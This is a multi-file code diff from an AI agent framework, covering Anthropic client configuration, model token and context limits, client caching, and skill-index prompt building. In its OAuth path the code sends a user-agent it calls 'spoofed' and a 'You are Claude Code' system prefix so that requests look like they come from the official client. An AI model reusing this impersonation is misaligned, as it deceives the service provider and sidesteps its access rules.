Compare commits
1 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 3b89a50aad |
@@ -59,15 +59,6 @@ OPENCODE_ZEN_API_KEY=
|
||||
# OpenCode Go provides access to open models (GLM-5, Kimi K2.5, MiniMax M2.5)
|
||||
# $10/month subscription. Get your key at: https://opencode.ai/auth
|
||||
OPENCODE_GO_API_KEY=
|
||||
|
||||
# =============================================================================
|
||||
# LLM PROVIDER (Hugging Face Inference Providers)
|
||||
# =============================================================================
|
||||
# Hugging Face routes to 20+ open models via unified OpenAI-compatible endpoint.
|
||||
# Free tier included ($0.10/month), no markup on provider rates.
|
||||
# Get your token at: https://huggingface.co/settings/tokens
|
||||
# Required permission: "Make calls to Inference Providers"
|
||||
HF_TOKEN=
|
||||
# OPENCODE_GO_BASE_URL=https://opencode.ai/zen/go/v1 # Override default base URL
|
||||
|
||||
# =============================================================================
|
||||
|
||||
@@ -35,54 +35,6 @@ ADAPTIVE_EFFORT_MAP = {
|
||||
"minimal": "low",
|
||||
}
|
||||
|
||||
# ── Max output token limits per Anthropic model ───────────────────────
|
||||
# Source: Anthropic docs + Cline model catalog. Anthropic's API requires
|
||||
# max_tokens as a mandatory field. Previously we hardcoded 16384, which
|
||||
# starves thinking-enabled models (thinking tokens count toward the limit).
|
||||
_ANTHROPIC_OUTPUT_LIMITS = {
|
||||
# Claude 4.6
|
||||
"claude-opus-4-6": 128_000,
|
||||
"claude-sonnet-4-6": 64_000,
|
||||
# Claude 4.5
|
||||
"claude-opus-4-5": 64_000,
|
||||
"claude-sonnet-4-5": 64_000,
|
||||
"claude-haiku-4-5": 64_000,
|
||||
# Claude 4
|
||||
"claude-opus-4": 32_000,
|
||||
"claude-sonnet-4": 64_000,
|
||||
# Claude 3.7
|
||||
"claude-3-7-sonnet": 128_000,
|
||||
# Claude 3.5
|
||||
"claude-3-5-sonnet": 8_192,
|
||||
"claude-3-5-haiku": 8_192,
|
||||
# Claude 3
|
||||
"claude-3-opus": 4_096,
|
||||
"claude-3-sonnet": 4_096,
|
||||
"claude-3-haiku": 4_096,
|
||||
}
|
||||
|
||||
# For any model not in the table, assume the highest current limit.
|
||||
# Future Anthropic models are unlikely to have *less* output capacity.
|
||||
_ANTHROPIC_DEFAULT_OUTPUT_LIMIT = 128_000
|
||||
|
||||
|
||||
def _get_anthropic_max_output(model: str) -> int:
|
||||
"""Look up the max output token limit for an Anthropic model.
|
||||
|
||||
Uses substring matching against _ANTHROPIC_OUTPUT_LIMITS so date-stamped
|
||||
model IDs (claude-sonnet-4-5-20250929) and variant suffixes (:1m, :fast)
|
||||
resolve correctly. Longest-prefix match wins to avoid e.g. "claude-3-5"
|
||||
matching before "claude-3-5-sonnet".
|
||||
"""
|
||||
m = model.lower()
|
||||
best_key = ""
|
||||
best_val = _ANTHROPIC_DEFAULT_OUTPUT_LIMIT
|
||||
for key, val in _ANTHROPIC_OUTPUT_LIMITS.items():
|
||||
if key in m and len(key) > len(best_key):
|
||||
best_key = key
|
||||
best_val = val
|
||||
return best_val
|
||||
|
||||
|
||||
def _supports_adaptive_thinking(model: str) -> bool:
|
||||
"""Return True for Claude 4.6 models that support adaptive thinking."""
|
||||
@@ -107,7 +59,6 @@ _OAUTH_ONLY_BETAS = [
|
||||
# The version must stay reasonably current — Anthropic rejects OAuth requests
|
||||
# when the spoofed user-agent version is too far behind the actual release.
|
||||
_CLAUDE_CODE_VERSION_FALLBACK = "2.1.74"
|
||||
_claude_code_version_cache: Optional[str] = None
|
||||
|
||||
|
||||
def _detect_claude_code_version() -> str:
|
||||
@@ -135,18 +86,11 @@ def _detect_claude_code_version() -> str:
|
||||
return _CLAUDE_CODE_VERSION_FALLBACK
|
||||
|
||||
|
||||
_CLAUDE_CODE_VERSION = _detect_claude_code_version()
|
||||
_CLAUDE_CODE_SYSTEM_PREFIX = "You are Claude Code, Anthropic's official CLI for Claude."
|
||||
_MCP_TOOL_PREFIX = "mcp_"
|
||||
|
||||
|
||||
def _get_claude_code_version() -> str:
|
||||
"""Lazily detect the installed Claude Code version when OAuth headers need it."""
|
||||
global _claude_code_version_cache
|
||||
if _claude_code_version_cache is None:
|
||||
_claude_code_version_cache = _detect_claude_code_version()
|
||||
return _claude_code_version_cache
|
||||
|
||||
|
||||
def _is_oauth_token(key: str) -> bool:
|
||||
"""Check if the key is an OAuth/setup token (not a regular Console API key).
|
||||
|
||||
@@ -188,7 +132,7 @@ def build_anthropic_client(api_key: str, base_url: str = None):
|
||||
kwargs["auth_token"] = api_key
|
||||
kwargs["default_headers"] = {
|
||||
"anthropic-beta": ",".join(all_betas),
|
||||
"user-agent": f"claude-cli/{_get_claude_code_version()} (external, cli)",
|
||||
"user-agent": f"claude-cli/{_CLAUDE_CODE_VERSION} (external, cli)",
|
||||
"x-app": "cli",
|
||||
}
|
||||
else:
|
||||
@@ -297,7 +241,7 @@ def _refresh_oauth_token(creds: Dict[str, Any]) -> Optional[str]:
|
||||
|
||||
headers = {
|
||||
"Content-Type": "application/json",
|
||||
"User-Agent": f"claude-cli/{_get_claude_code_version()} (external, cli)",
|
||||
"User-Agent": f"claude-cli/{_CLAUDE_CODE_VERSION} (external, cli)",
|
||||
}
|
||||
|
||||
for endpoint in token_endpoints:
|
||||
@@ -762,21 +706,14 @@ def convert_messages_to_anthropic(
|
||||
result.append({"role": "user", "content": [tool_result]})
|
||||
continue
|
||||
|
||||
# Regular user message — validate non-empty content (Anthropic rejects empty)
|
||||
# Regular user message
|
||||
if isinstance(content, list):
|
||||
converted_blocks = _convert_content_to_anthropic(content)
|
||||
# Check if all text blocks are empty
|
||||
if not converted_blocks or all(
|
||||
b.get("text", "").strip() == ""
|
||||
for b in converted_blocks
|
||||
if isinstance(b, dict) and b.get("type") == "text"
|
||||
):
|
||||
converted_blocks = [{"type": "text", "text": "(empty message)"}]
|
||||
result.append({"role": "user", "content": converted_blocks})
|
||||
result.append({
|
||||
"role": "user",
|
||||
"content": converted_blocks or [{"type": "text", "text": ""}],
|
||||
})
|
||||
else:
|
||||
# Validate string content is non-empty
|
||||
if not content or (isinstance(content, str) and not content.strip()):
|
||||
content = "(empty message)"
|
||||
result.append({"role": "user", "content": content})
|
||||
|
||||
# Strip orphaned tool_use blocks (no matching tool_result follows)
|
||||
@@ -866,15 +803,9 @@ def build_anthropic_kwargs(
|
||||
tool_choice: Optional[str] = None,
|
||||
is_oauth: bool = False,
|
||||
preserve_dots: bool = False,
|
||||
context_length: Optional[int] = None,
|
||||
) -> Dict[str, Any]:
|
||||
"""Build kwargs for anthropic.messages.create().
|
||||
|
||||
When *max_tokens* is None, the model's native output limit is used
|
||||
(e.g. 128K for Opus 4.6, 64K for Sonnet 4.6). If *context_length*
|
||||
is provided, the effective limit is clamped so it doesn't exceed
|
||||
the context window.
|
||||
|
||||
When *is_oauth* is True, applies Claude Code compatibility transforms:
|
||||
system prompt prefix, tool name prefixing, and prompt sanitization.
|
||||
|
||||
@@ -885,12 +816,7 @@ def build_anthropic_kwargs(
|
||||
anthropic_tools = convert_tools_to_anthropic(tools) if tools else []
|
||||
|
||||
model = normalize_model_name(model, preserve_dots=preserve_dots)
|
||||
effective_max_tokens = max_tokens or _get_anthropic_max_output(model)
|
||||
|
||||
# Clamp to context window if the user set a lower context_length
|
||||
# (e.g. custom endpoint with limited capacity).
|
||||
if context_length and effective_max_tokens > context_length:
|
||||
effective_max_tokens = max(context_length - 1, 1)
|
||||
effective_max_tokens = max_tokens or 16384
|
||||
|
||||
# ── OAuth: Claude Code identity ──────────────────────────────────
|
||||
if is_oauth:
|
||||
|
||||
+2
-122
@@ -693,13 +693,7 @@ def _try_anthropic() -> Tuple[Optional[Any], Optional[str]]:
|
||||
is_oauth = _is_oauth_token(token)
|
||||
model = _API_KEY_PROVIDER_AUX_MODELS.get("anthropic", "claude-haiku-4-5-20251001")
|
||||
logger.debug("Auxiliary client: Anthropic native (%s) at %s (oauth=%s)", model, base_url, is_oauth)
|
||||
try:
|
||||
real_client = build_anthropic_client(token, base_url)
|
||||
except ImportError:
|
||||
# The anthropic_adapter module imports fine but the SDK itself is
|
||||
# missing — build_anthropic_client raises ImportError at call time
|
||||
# when _anthropic_sdk is None. Treat as unavailable.
|
||||
return None, None
|
||||
real_client = build_anthropic_client(token, base_url)
|
||||
return AnthropicAuxiliaryClient(real_client, model, token, base_url, is_oauth=is_oauth), model
|
||||
|
||||
|
||||
@@ -1137,13 +1131,7 @@ def resolve_vision_provider_client(
|
||||
return "custom", client, final_model
|
||||
|
||||
if requested == "auto":
|
||||
ordered = list(_VISION_AUTO_PROVIDER_ORDER)
|
||||
preferred = _preferred_main_vision_provider()
|
||||
if preferred in ordered:
|
||||
ordered.remove(preferred)
|
||||
ordered.insert(0, preferred)
|
||||
|
||||
for candidate in ordered:
|
||||
for candidate in get_available_vision_backends():
|
||||
sync_client, default_model = _resolve_strict_vision_backend(candidate)
|
||||
if sync_client is not None:
|
||||
return _finalize(candidate, sync_client, default_model)
|
||||
@@ -1216,39 +1204,6 @@ _client_cache: Dict[tuple, tuple] = {}
|
||||
_client_cache_lock = threading.Lock()
|
||||
|
||||
|
||||
def neuter_async_httpx_del() -> None:
|
||||
"""Monkey-patch ``AsyncHttpxClientWrapper.__del__`` to be a no-op.
|
||||
|
||||
The OpenAI SDK's ``AsyncHttpxClientWrapper.__del__`` schedules
|
||||
``self.aclose()`` via ``asyncio.get_running_loop().create_task()``.
|
||||
When an ``AsyncOpenAI`` client is garbage-collected while
|
||||
prompt_toolkit's event loop is running (the common CLI idle state),
|
||||
the ``aclose()`` task runs on prompt_toolkit's loop but the
|
||||
underlying TCP transport is bound to a *different* loop (the worker
|
||||
thread's loop that the client was originally created on). If that
|
||||
loop is closed or its thread is dead, the transport's
|
||||
``self._loop.call_soon()`` raises ``RuntimeError("Event loop is
|
||||
closed")``, which prompt_toolkit surfaces as "Unhandled exception
|
||||
in event loop ... Press ENTER to continue...".
|
||||
|
||||
Neutering ``__del__`` is safe because:
|
||||
- Cached clients are explicitly cleaned via ``_force_close_async_httpx``
|
||||
on stale-loop detection and ``shutdown_cached_clients`` on exit.
|
||||
- Uncached clients' TCP connections are cleaned up by the OS when the
|
||||
process exits.
|
||||
- The OpenAI SDK itself marks this as a TODO (``# TODO(someday):
|
||||
support non asyncio runtimes here``).
|
||||
|
||||
Call this once at CLI startup, before any ``AsyncOpenAI`` clients are
|
||||
created.
|
||||
"""
|
||||
try:
|
||||
from openai._base_client import AsyncHttpxClientWrapper
|
||||
AsyncHttpxClientWrapper.__del__ = lambda self: None # type: ignore[assignment]
|
||||
except (ImportError, AttributeError):
|
||||
pass # Graceful degradation if the SDK changes its internals
|
||||
|
||||
|
||||
def _force_close_async_httpx(client: Any) -> None:
|
||||
"""Mark the httpx AsyncClient inside an AsyncOpenAI client as closed.
|
||||
|
||||
@@ -1296,25 +1251,6 @@ def shutdown_cached_clients() -> None:
|
||||
_client_cache.clear()
|
||||
|
||||
|
||||
def cleanup_stale_async_clients() -> None:
|
||||
"""Force-close cached async clients whose event loop is closed.
|
||||
|
||||
Call this after each agent turn to proactively clean up stale clients
|
||||
before GC can trigger ``AsyncHttpxClientWrapper.__del__`` on them.
|
||||
This is defense-in-depth — the primary fix is ``neuter_async_httpx_del``
|
||||
which disables ``__del__`` entirely.
|
||||
"""
|
||||
with _client_cache_lock:
|
||||
stale_keys = []
|
||||
for key, entry in _client_cache.items():
|
||||
client, _default, cached_loop = entry
|
||||
if cached_loop is not None and cached_loop.is_closed():
|
||||
_force_close_async_httpx(client)
|
||||
stale_keys.append(key)
|
||||
for key in stale_keys:
|
||||
del _client_cache[key]
|
||||
|
||||
|
||||
def _get_cached_client(
|
||||
provider: str,
|
||||
model: str = None,
|
||||
@@ -1616,62 +1552,6 @@ def call_llm(
|
||||
raise
|
||||
|
||||
|
||||
def extract_content_or_reasoning(response) -> str:
|
||||
"""Extract content from an LLM response, falling back to reasoning fields.
|
||||
|
||||
Mirrors the main agent loop's behavior when a reasoning model (DeepSeek-R1,
|
||||
Qwen-QwQ, etc.) returns ``content=None`` with reasoning in structured fields.
|
||||
|
||||
Resolution order:
|
||||
1. ``message.content`` — strip inline think/reasoning blocks, check for
|
||||
remaining non-whitespace text.
|
||||
2. ``message.reasoning`` / ``message.reasoning_content`` — direct
|
||||
structured reasoning fields (DeepSeek, Moonshot, Novita, etc.).
|
||||
3. ``message.reasoning_details`` — OpenRouter unified array format.
|
||||
|
||||
Returns the best available text, or ``""`` if nothing found.
|
||||
"""
|
||||
import re
|
||||
|
||||
msg = response.choices[0].message
|
||||
content = (msg.content or "").strip()
|
||||
|
||||
if content:
|
||||
# Strip inline think/reasoning blocks (mirrors _strip_think_blocks)
|
||||
cleaned = re.sub(
|
||||
r"<(?:think|thinking|reasoning|REASONING_SCRATCHPAD)>"
|
||||
r".*?"
|
||||
r"</(?:think|thinking|reasoning|REASONING_SCRATCHPAD)>",
|
||||
"", content, flags=re.DOTALL | re.IGNORECASE,
|
||||
).strip()
|
||||
if cleaned:
|
||||
return cleaned
|
||||
|
||||
# Content is empty or reasoning-only — try structured reasoning fields
|
||||
reasoning_parts: list[str] = []
|
||||
for field in ("reasoning", "reasoning_content"):
|
||||
val = getattr(msg, field, None)
|
||||
if val and isinstance(val, str) and val.strip() and val not in reasoning_parts:
|
||||
reasoning_parts.append(val.strip())
|
||||
|
||||
details = getattr(msg, "reasoning_details", None)
|
||||
if details and isinstance(details, list):
|
||||
for detail in details:
|
||||
if isinstance(detail, dict):
|
||||
summary = (
|
||||
detail.get("summary")
|
||||
or detail.get("content")
|
||||
or detail.get("text")
|
||||
)
|
||||
if summary and summary not in reasoning_parts:
|
||||
reasoning_parts.append(summary.strip() if isinstance(summary, str) else str(summary))
|
||||
|
||||
if reasoning_parts:
|
||||
return "\n\n".join(reasoning_parts)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
async def async_call_llm(
|
||||
task: str = None,
|
||||
*,
|
||||
|
||||
@@ -286,16 +286,12 @@ def _expand_git_reference(
|
||||
args: list[str],
|
||||
label: str,
|
||||
) -> tuple[str | None, str | None]:
|
||||
try:
|
||||
result = subprocess.run(
|
||||
["git", *args],
|
||||
cwd=cwd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=30,
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
return f"{ref.raw}: git command timed out (30s)", None
|
||||
result = subprocess.run(
|
||||
["git", *args],
|
||||
cwd=cwd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
if result.returncode != 0:
|
||||
stderr = (result.stderr or "").strip() or "git command failed"
|
||||
return f"{ref.raw}: {stderr}", None
|
||||
@@ -453,12 +449,9 @@ def _rg_files(path: Path, cwd: Path, limit: int) -> list[Path] | None:
|
||||
cwd=cwd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10,
|
||||
)
|
||||
except FileNotFoundError:
|
||||
return None
|
||||
except subprocess.TimeoutExpired:
|
||||
return None
|
||||
if result.returncode != 0:
|
||||
return None
|
||||
files = [Path(line.strip()) for line in result.stdout.splitlines() if line.strip()]
|
||||
|
||||
+4
-18
@@ -231,7 +231,7 @@ class KawaiiSpinner:
|
||||
"analyzing", "computing", "synthesizing", "formulating", "brainstorming",
|
||||
]
|
||||
|
||||
def __init__(self, message: str = "", spinner_type: str = 'dots', print_fn=None):
|
||||
def __init__(self, message: str = "", spinner_type: str = 'dots'):
|
||||
self.message = message
|
||||
self.spinner_frames = self.SPINNERS.get(spinner_type, self.SPINNERS['dots'])
|
||||
self.running = False
|
||||
@@ -239,26 +239,12 @@ class KawaiiSpinner:
|
||||
self.frame_idx = 0
|
||||
self.start_time = None
|
||||
self.last_line_len = 0
|
||||
# Optional callable to route all output through (e.g. a no-op for silent
|
||||
# background agents). When set, bypasses self._out entirely so that
|
||||
# agents with _print_fn overridden remain fully silent.
|
||||
self._print_fn = print_fn
|
||||
# Capture stdout NOW, before any redirect_stdout(devnull) from
|
||||
# child agents can replace sys.stdout with a black hole.
|
||||
self._out = sys.stdout
|
||||
|
||||
def _write(self, text: str, end: str = '\n', flush: bool = False):
|
||||
"""Write to the stdout captured at spinner creation time.
|
||||
|
||||
If a print_fn was supplied at construction, all output is routed through
|
||||
it instead — allowing callers to silence the spinner with a no-op lambda.
|
||||
"""
|
||||
if self._print_fn is not None:
|
||||
try:
|
||||
self._print_fn(text)
|
||||
except Exception:
|
||||
pass
|
||||
return
|
||||
"""Write to the stdout captured at spinner creation time."""
|
||||
try:
|
||||
self._out.write(text + end)
|
||||
if flush:
|
||||
@@ -699,7 +685,7 @@ def format_context_pressure(
|
||||
threshold_percent: Compaction threshold as a fraction of context window.
|
||||
compression_enabled: Whether auto-compression is active.
|
||||
"""
|
||||
pct_int = min(int(compaction_progress * 100), 100)
|
||||
pct_int = int(compaction_progress * 100)
|
||||
filled = min(int(compaction_progress * _BAR_WIDTH), _BAR_WIDTH)
|
||||
bar = _BAR_FILLED * filled + _BAR_EMPTY * (_BAR_WIDTH - filled)
|
||||
|
||||
@@ -729,7 +715,7 @@ def format_context_pressure_gateway(
|
||||
No ANSI — just Unicode and plain text suitable for Telegram/Discord/etc.
|
||||
The percentage shows progress toward the compaction threshold.
|
||||
"""
|
||||
pct_int = min(int(compaction_progress * 100), 100)
|
||||
pct_int = int(compaction_progress * 100)
|
||||
filled = min(int(compaction_progress * _BAR_WIDTH), _BAR_WIDTH)
|
||||
bar = _BAR_FILLED * filled + _BAR_EMPTY * (_BAR_WIDTH - filled)
|
||||
|
||||
|
||||
@@ -113,15 +113,6 @@ DEFAULT_CONTEXT_LENGTHS = {
|
||||
"glm": 202752,
|
||||
# Kimi
|
||||
"kimi": 262144,
|
||||
# Hugging Face Inference Providers — model IDs use org/name format
|
||||
"Qwen/Qwen3.5-397B-A17B": 131072,
|
||||
"Qwen/Qwen3.5-35B-A3B": 131072,
|
||||
"deepseek-ai/DeepSeek-V3.2": 65536,
|
||||
"moonshotai/Kimi-K2.5": 262144,
|
||||
"moonshotai/Kimi-K2-Thinking": 262144,
|
||||
"MiniMaxAI/MiniMax-M2.5": 204800,
|
||||
"XiaomiMiMo/MiMo-V2-Flash": 32768,
|
||||
"zai-org/GLM-5": 202752,
|
||||
}
|
||||
|
||||
_CONTEXT_LENGTH_KEYS = (
|
||||
|
||||
+106
-271
@@ -4,27 +4,14 @@ All functions are stateless. AIAgent._build_system_prompt() calls these to
|
||||
assemble pieces, then combines them with memory and ephemeral prompts.
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import threading
|
||||
from collections import OrderedDict
|
||||
from pathlib import Path
|
||||
|
||||
from hermes_constants import get_hermes_home
|
||||
from typing import Optional
|
||||
|
||||
from agent.skill_utils import (
|
||||
extract_skill_conditions,
|
||||
extract_skill_description,
|
||||
get_disabled_skill_names,
|
||||
iter_skill_index_files,
|
||||
parse_frontmatter,
|
||||
skill_matches_platform,
|
||||
)
|
||||
from utils import atomic_json_write
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -169,25 +156,6 @@ SKILLS_GUIDANCE = (
|
||||
"Skills that aren't maintained become liabilities."
|
||||
)
|
||||
|
||||
TOOL_USE_ENFORCEMENT_GUIDANCE = (
|
||||
"# Tool-use enforcement\n"
|
||||
"You MUST use your tools to take action — do not describe what you would do "
|
||||
"or plan to do without actually doing it. When you say you will perform an "
|
||||
"action (e.g. 'I will run the tests', 'Let me check the file', 'I will create "
|
||||
"the project'), you MUST immediately make the corresponding tool call in the same "
|
||||
"response. Never end your turn with a promise of future action — execute it now.\n"
|
||||
"Keep working until the task is actually complete. Do not stop with a summary of "
|
||||
"what you plan to do next time. If you have tools available that can accomplish "
|
||||
"the task, use them instead of telling the user what you would do.\n"
|
||||
"Every response should either (a) contain tool calls that make progress, or "
|
||||
"(b) deliver a final result to the user. Responses that only describe intentions "
|
||||
"without acting are not acceptable."
|
||||
)
|
||||
|
||||
# Model name substrings that trigger tool-use enforcement guidance.
|
||||
# Add new patterns here when a model family needs explicit steering.
|
||||
TOOL_USE_ENFORCEMENT_MODELS = ("gpt", "codex")
|
||||
|
||||
PLATFORM_HINTS = {
|
||||
"whatsapp": (
|
||||
"You are on a text messaging communication platform, WhatsApp. "
|
||||
@@ -262,111 +230,6 @@ CONTEXT_TRUNCATE_HEAD_RATIO = 0.7
|
||||
CONTEXT_TRUNCATE_TAIL_RATIO = 0.2
|
||||
|
||||
|
||||
# =========================================================================
|
||||
# Skills prompt cache
|
||||
# =========================================================================
|
||||
|
||||
_SKILLS_PROMPT_CACHE_MAX = 8
|
||||
_SKILLS_PROMPT_CACHE: OrderedDict[tuple, str] = OrderedDict()
|
||||
_SKILLS_PROMPT_CACHE_LOCK = threading.Lock()
|
||||
_SKILLS_SNAPSHOT_VERSION = 1
|
||||
|
||||
|
||||
def _skills_prompt_snapshot_path() -> Path:
|
||||
return get_hermes_home() / ".skills_prompt_snapshot.json"
|
||||
|
||||
|
||||
def clear_skills_system_prompt_cache(*, clear_snapshot: bool = False) -> None:
|
||||
"""Drop the in-process skills prompt cache (and optionally the disk snapshot)."""
|
||||
with _SKILLS_PROMPT_CACHE_LOCK:
|
||||
_SKILLS_PROMPT_CACHE.clear()
|
||||
if clear_snapshot:
|
||||
try:
|
||||
_skills_prompt_snapshot_path().unlink(missing_ok=True)
|
||||
except OSError as e:
|
||||
logger.debug("Could not remove skills prompt snapshot: %s", e)
|
||||
|
||||
|
||||
def _build_skills_manifest(skills_dir: Path) -> dict[str, list[int]]:
|
||||
"""Build an mtime/size manifest of all SKILL.md and DESCRIPTION.md files."""
|
||||
manifest: dict[str, list[int]] = {}
|
||||
for filename in ("SKILL.md", "DESCRIPTION.md"):
|
||||
for path in iter_skill_index_files(skills_dir, filename):
|
||||
try:
|
||||
st = path.stat()
|
||||
except OSError:
|
||||
continue
|
||||
manifest[str(path.relative_to(skills_dir))] = [st.st_mtime_ns, st.st_size]
|
||||
return manifest
|
||||
|
||||
|
||||
def _load_skills_snapshot(skills_dir: Path) -> Optional[dict]:
|
||||
"""Load the disk snapshot if it exists and its manifest still matches."""
|
||||
snapshot_path = _skills_prompt_snapshot_path()
|
||||
if not snapshot_path.exists():
|
||||
return None
|
||||
try:
|
||||
snapshot = json.loads(snapshot_path.read_text(encoding="utf-8"))
|
||||
except Exception:
|
||||
return None
|
||||
if not isinstance(snapshot, dict):
|
||||
return None
|
||||
if snapshot.get("version") != _SKILLS_SNAPSHOT_VERSION:
|
||||
return None
|
||||
if snapshot.get("manifest") != _build_skills_manifest(skills_dir):
|
||||
return None
|
||||
return snapshot
|
||||
|
||||
|
||||
def _write_skills_snapshot(
|
||||
skills_dir: Path,
|
||||
manifest: dict[str, list[int]],
|
||||
skill_entries: list[dict],
|
||||
category_descriptions: dict[str, str],
|
||||
) -> None:
|
||||
"""Persist skill metadata to disk for fast cold-start reuse."""
|
||||
payload = {
|
||||
"version": _SKILLS_SNAPSHOT_VERSION,
|
||||
"manifest": manifest,
|
||||
"skills": skill_entries,
|
||||
"category_descriptions": category_descriptions,
|
||||
}
|
||||
try:
|
||||
atomic_json_write(_skills_prompt_snapshot_path(), payload)
|
||||
except Exception as e:
|
||||
logger.debug("Could not write skills prompt snapshot: %s", e)
|
||||
|
||||
|
||||
def _build_snapshot_entry(
|
||||
skill_file: Path,
|
||||
skills_dir: Path,
|
||||
frontmatter: dict,
|
||||
description: str,
|
||||
) -> dict:
|
||||
"""Build a serialisable metadata dict for one skill."""
|
||||
rel_path = skill_file.relative_to(skills_dir)
|
||||
parts = rel_path.parts
|
||||
if len(parts) >= 2:
|
||||
skill_name = parts[-2]
|
||||
category = "/".join(parts[:-2]) if len(parts) > 2 else parts[0]
|
||||
else:
|
||||
category = "general"
|
||||
skill_name = skill_file.parent.name
|
||||
|
||||
platforms = frontmatter.get("platforms") or []
|
||||
if isinstance(platforms, str):
|
||||
platforms = [platforms]
|
||||
|
||||
return {
|
||||
"skill_name": skill_name,
|
||||
"category": category,
|
||||
"frontmatter_name": str(frontmatter.get("name", skill_name)),
|
||||
"description": description,
|
||||
"platforms": [str(p).strip() for p in platforms if str(p).strip()],
|
||||
"conditions": extract_skill_conditions(frontmatter),
|
||||
}
|
||||
|
||||
|
||||
# =========================================================================
|
||||
# Skills index
|
||||
# =========================================================================
|
||||
@@ -378,13 +241,22 @@ def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
|
||||
(True, {}, "") to err on the side of showing the skill.
|
||||
"""
|
||||
try:
|
||||
from tools.skills_tool import _parse_frontmatter, skill_matches_platform
|
||||
|
||||
raw = skill_file.read_text(encoding="utf-8")[:2000]
|
||||
frontmatter, _ = parse_frontmatter(raw)
|
||||
frontmatter, _ = _parse_frontmatter(raw)
|
||||
|
||||
if not skill_matches_platform(frontmatter):
|
||||
return False, frontmatter, ""
|
||||
return False, {}, ""
|
||||
|
||||
return True, frontmatter, extract_skill_description(frontmatter)
|
||||
desc = ""
|
||||
raw_desc = frontmatter.get("description", "")
|
||||
if raw_desc:
|
||||
desc = str(raw_desc).strip().strip("'\"")
|
||||
if len(desc) > 60:
|
||||
desc = desc[:57] + "..."
|
||||
|
||||
return True, frontmatter, desc
|
||||
except Exception as e:
|
||||
logger.debug("Failed to parse skill file %s: %s", skill_file, e)
|
||||
return True, {}, ""
|
||||
@@ -393,9 +265,16 @@ def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
|
||||
def _read_skill_conditions(skill_file: Path) -> dict:
|
||||
"""Extract conditional activation fields from SKILL.md frontmatter."""
|
||||
try:
|
||||
from tools.skills_tool import _parse_frontmatter
|
||||
raw = skill_file.read_text(encoding="utf-8")[:2000]
|
||||
frontmatter, _ = parse_frontmatter(raw)
|
||||
return extract_skill_conditions(frontmatter)
|
||||
frontmatter, _ = _parse_frontmatter(raw)
|
||||
hermes = frontmatter.get("metadata", {}).get("hermes", {})
|
||||
return {
|
||||
"fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
|
||||
"requires_toolsets": hermes.get("requires_toolsets", []),
|
||||
"fallback_for_tools": hermes.get("fallback_for_tools", []),
|
||||
"requires_tools": hermes.get("requires_tools", []),
|
||||
}
|
||||
except Exception as e:
|
||||
logger.debug("Failed to read skill conditions from %s: %s", skill_file, e)
|
||||
return {}
|
||||
@@ -438,12 +317,10 @@ def build_skills_system_prompt(
|
||||
) -> str:
|
||||
"""Build a compact skill index for the system prompt.
|
||||
|
||||
Two-layer cache:
|
||||
1. In-process LRU dict keyed by (skills_dir, tools, toolsets)
|
||||
2. Disk snapshot (``.skills_prompt_snapshot.json``) validated by
|
||||
mtime/size manifest — survives process restarts
|
||||
|
||||
Falls back to a full filesystem scan when both layers miss.
|
||||
Scans ~/.hermes/skills/ for SKILL.md files grouped by category.
|
||||
Includes per-skill descriptions from frontmatter so the model can
|
||||
match skills by meaning, not just name.
|
||||
Filters out skills incompatible with the current OS platform.
|
||||
"""
|
||||
hermes_home = get_hermes_home()
|
||||
skills_dir = hermes_home / "skills"
|
||||
@@ -451,140 +328,98 @@ def build_skills_system_prompt(
|
||||
if not skills_dir.exists():
|
||||
return ""
|
||||
|
||||
# ── Layer 1: in-process LRU cache ─────────────────────────────────
|
||||
cache_key = (
|
||||
str(skills_dir.resolve()),
|
||||
tuple(sorted(str(t) for t in (available_tools or set()))),
|
||||
tuple(sorted(str(ts) for ts in (available_toolsets or set()))),
|
||||
)
|
||||
with _SKILLS_PROMPT_CACHE_LOCK:
|
||||
cached = _SKILLS_PROMPT_CACHE.get(cache_key)
|
||||
if cached is not None:
|
||||
_SKILLS_PROMPT_CACHE.move_to_end(cache_key)
|
||||
return cached
|
||||
|
||||
disabled = get_disabled_skill_names()
|
||||
|
||||
# ── Layer 2: disk snapshot ────────────────────────────────────────
|
||||
snapshot = _load_skills_snapshot(skills_dir)
|
||||
# Collect skills with descriptions, grouped by category.
|
||||
# Each entry: (skill_name, description)
|
||||
# Supports sub-categories: skills/mlops/training/axolotl/SKILL.md
|
||||
# -> category "mlops/training", skill "axolotl"
|
||||
# Load disabled skill names once for the entire scan
|
||||
try:
|
||||
from tools.skills_tool import _get_disabled_skill_names
|
||||
disabled = _get_disabled_skill_names()
|
||||
except Exception:
|
||||
disabled = set()
|
||||
|
||||
skills_by_category: dict[str, list[tuple[str, str]]] = {}
|
||||
category_descriptions: dict[str, str] = {}
|
||||
|
||||
if snapshot is not None:
|
||||
# Fast path: use pre-parsed metadata from disk
|
||||
for entry in snapshot.get("skills", []):
|
||||
if not isinstance(entry, dict):
|
||||
continue
|
||||
skill_name = entry.get("skill_name") or ""
|
||||
category = entry.get("category") or "general"
|
||||
frontmatter_name = entry.get("frontmatter_name") or skill_name
|
||||
platforms = entry.get("platforms") or []
|
||||
if not skill_matches_platform({"platforms": platforms}):
|
||||
continue
|
||||
if frontmatter_name in disabled or skill_name in disabled:
|
||||
continue
|
||||
if not _skill_should_show(
|
||||
entry.get("conditions") or {},
|
||||
available_tools,
|
||||
available_toolsets,
|
||||
):
|
||||
continue
|
||||
skills_by_category.setdefault(category, []).append(
|
||||
(skill_name, entry.get("description", ""))
|
||||
)
|
||||
category_descriptions = {
|
||||
str(k): str(v)
|
||||
for k, v in (snapshot.get("category_descriptions") or {}).items()
|
||||
for skill_file in skills_dir.rglob("SKILL.md"):
|
||||
is_compatible, frontmatter, desc = _parse_skill_file(skill_file)
|
||||
if not is_compatible:
|
||||
continue
|
||||
rel_path = skill_file.relative_to(skills_dir)
|
||||
parts = rel_path.parts
|
||||
if len(parts) >= 2:
|
||||
skill_name = parts[-2]
|
||||
